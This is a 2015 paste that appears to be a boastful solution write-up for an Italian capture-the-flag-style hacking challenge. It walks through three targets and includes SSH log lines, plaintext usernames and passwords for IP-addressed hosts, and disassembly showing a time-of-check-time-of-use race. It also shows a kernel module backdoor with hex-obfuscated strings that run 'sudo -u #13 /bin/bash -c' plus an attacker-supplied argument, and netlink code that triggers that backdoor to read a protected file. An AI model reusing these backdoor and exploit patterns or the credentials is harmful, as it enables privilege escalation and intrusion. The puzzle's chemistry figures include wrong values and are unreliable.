Guest User

Untitled

a guest
Apr 27th, 2015
1,700
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. `å██▄ ^╚▒╖ .▄▓█
  2. ███ ╓▒▒ ██
  3. ▄██▀ ,╥▒╙ ▄▓*╙▀▓ ▄▌*╙▀▓╕ ,▄▀T╙▀▌,*▓▓¥ ╓▓ ½▓* ▄▌*╙▀▓, ██╓▄▓██▓▄
  4. .φ▓▌TJ╓▄▒^` ██╕ ^ ██ ╟█µ╔█▌ ██ ╙█▌ ,▌█▓ ▓`,██ ▓█ ██^ å█▓
  5. ▓██ ╙██▄ ▀██▓▄ ║█▌╙╙╙╙å▀^▓█▀╙╙╙╙▀▀ å█╕ ▓ └█▌ ▐▀ ╫█▌╙╙╙╙å▀ ██ ██
  6. ,███ ▓██^ -╕ ╙██ ██, ╙█▓ ██╣` ╙█▌▌ └██ ██ ,█▀
  7. ,▄▓█▀T╓▄█▀T █▄╓╓▄▀T ▀█▓▄▄φ#* "▀█▓▄▄φΦ^ █Γ ╙█ `▀█▓▄▄φΦ² ██▓▄╦╗=▀Γ
  8. ,, ,, ,, ,, ,, ,, ,,,,, ,, , ,, ╓
  9. ╫ J╫ ▌▌╩▒W╝$ ▌▌$░╬▓ ▐ ▓≈⌐ å≈▌▌ ▐ ▌▌<╫ free4all
  10.  
  11.  
  12. #1 target
  13. Invalid user FTcc..sb1 from 212.25.179.164
  14. Accepted password for kermit from 212.25.179.164 port 39157 ssh
  15.  
  16. #2 target
  17.  
  18. Time-of-Check-Time-of-Use Race condition
  19. https://capec.mitre.org/data/definitions/29.html
  20.  
  21. binary: gmanager
  22.  
  23. 00000000004013f2 call sleep@PLT
  24. 00000000004013f7 lea rax, qword [ss:rbp+var_4B0]
  25. 00000000004013fe mov rsi, rax ; argument #2 for method stat
  26. 0000000000401401 mov edi, 0x401c31 ; "./lastlog", argument #1 for method stat
  27. 0000000000401406 call stat <----------
  28. 000000000040140b mov dword [ss:rbp+var_C], eax
  29. 000000000040140e cmp dword [ss:rbp+var_C], 0x0
  30. 0000000000401412 jne 0x4014bc
  31.  
  32. 0000000000401418 mov esi, 0x2 ; argument "amode" for method access@PLT
  33. 000000000040141d mov edi, 0x401c31 ; "./lastlog", argument "path" for method access@PLT
  34. 0000000000401422 call access@PLT <---------- TOC
  35. 0000000000401427 test eax, eax
  36. 0000000000401429 jne 0x4014a8
  37.  
  38. 000000000040142b mov edi, 0x2 ; argument "seconds" for method sleep@PLT
  39. 0000000000401430 call sleep@PLT <---------- our time
  40. 0000000000401435 mov esi, 0x401c3b ; 0x401c3b (_IO_stdin_used + 0x33b), argument "mode" for method fopen@PLT
  41. 000000000040143a mov edi, 0x401c31 ; "./lastlog", argument "filename" for method fopen@PLT
  42. 000000000040143f call fopen@PLT <---- TOU
  43.  
  44.  
  45. La tua missione continua qui:
  46.  
  47. hostname: 212.25.162.150
  48. username: public
  49. password: je3gi7to
  50.  
  51. Recupera la formula del vaccino contenuta nel file /home/monday/antigene_sbc
  52.  
  53. Complimenti!
  54. Sei riuscito a recuperare in tempo la formula del vaccino di nuova generazione su cui stava lavorando la Quality Cloud Farmaceutic.
  55. Di seguito sono riportate le sostanze usate, con le opportune caratteristiche:
  56.  
  57. - Acido Acetilsalicilico, formula bruta C7H6O3, P molecolare 138 uma, d=140 g/cm3
  58. - Anidride Acetica , formula bruta C4H6O3, P molecolare 109 uma, d=1,08 g/cm3
  59. - Acido acetilsalicilico, formula bruta C9H8O4, P molecolare=180 uma, d=1,35 g/cm3
  60. - Acido acetico, formula bruta C2H4O2, P molecolare 60 uma,d 1,05 g/cm3
  61.  
  62. Il tuo prossimo obiettivo:
  63.  
  64. hostname: 212.25.162.9
  65. username: anonymous
  66. password: fe7feeng
  67.  
  68. Ottieni le informazioni contenute in /etc/BlackoutResurrection
  69.  
  70.  
  71. #3 target
  72.  
  73. lsmod
  74. CODICE MODULO KERNEL: /develop/context_switch/
  75.  
  76. #ifdef DEBUG
  77. #define DGB_TOOL "/usr/share/nl/"
  78.  
  79. else if (!strncmp(comm,"DEBUG",5)) <--------
  80. {
  81. char scpt[1024];
  82. memset(scpt,'\0',sizeof(scpt));
  83. strncat(scpt,DGB_TOOL,strlen(DGB_TOOL));
  84. strncat(scpt,arg,sizeof(scpt)-strlen(DGB_TOOL)-1); <------
  85.  
  86. char *debug[] = { "\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x73\x75\x64\x6f", -> '/usr/bin/sudo'
  87. "\x2d\x75", -> '-u'
  88. "\x23\x31\x33", -> '#13'
  89. "\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68", -> '/bin/bash'
  90. "\x2d\x63", -> '-c'
  91. scpt,
  92. "\x4e\x55\x4c\x4c" }; -> 'NULL'
  93. call_usermodehelper(debug[0], debug, NULL, UMH_WAIT_EXEC); <------
  94.  
  95. }
  96. #endif
  97.  
  98. SEND TO KERNEL A NETLINK MESSAGE WITH A CUSTOM PAYLOAD:
  99.  
  100. memset(&dest_addr, 0, sizeof(dest_addr));
  101. dest_addr.nl_family = AF_NETLINK;
  102. dest_addr.nl_pid = 0; /* For Linux Kernel */
  103. dest_addr.nl_groups = 0; /* unicast */
  104.  
  105. nlh=(struct nlmsghdr *)malloc(
  106. NLMSG_SPACE(MAX_PAYLOAD));
  107. /* Fill the netlink message header */
  108. nlh->nlmsg_len = NLMSG_SPACE(MAX_PAYLOAD);
  109. nlh->nlmsg_pid = getpid(); /* self pid */
  110. nlh->nlmsg_flags = 0;
  111. /* Fill in the netlink message payload */
  112. strcpy(NLMSG_DATA(nlh), "DEBUG=cat /etc/BlackoutResurrection"); <-------
  113.  
  114. Complimenti!
  115. Sei riuscito a localizzare il covo hacker in cui sono tenuti i dispositivi contenenti informazioni riservate della Quality Cloud Farmaceutic.
  116.  
  117. Indirizzo: Finsbury Park, Greater London, Inghilterra
  118. Codice Postale: N4
  119. Latitudine: 51.5647
  120. Longitudine: -⁠0.1064
  121. Precisione: 4
  122.  
  123. #END
  124.  
  125. @seeweblive NEXT TIME TRY MORE HARDER !!!! ;)
  126.  
  127.  
  128. we are proud to say thanks to the underground scene from all Italy,
  129. especially the greatest hacker aranZulla, the god of hacking emgentili,
  130. (D)al ch(E)cco (FT), the red crew "de-micheli e andst7" for their work on fake accounts on twitter, voidsec, the backbox team.
  131. we grew up eating bread, CLUSIT guide and blackhatz songz by astharot. We hope to see you @Smau
RAW Paste Data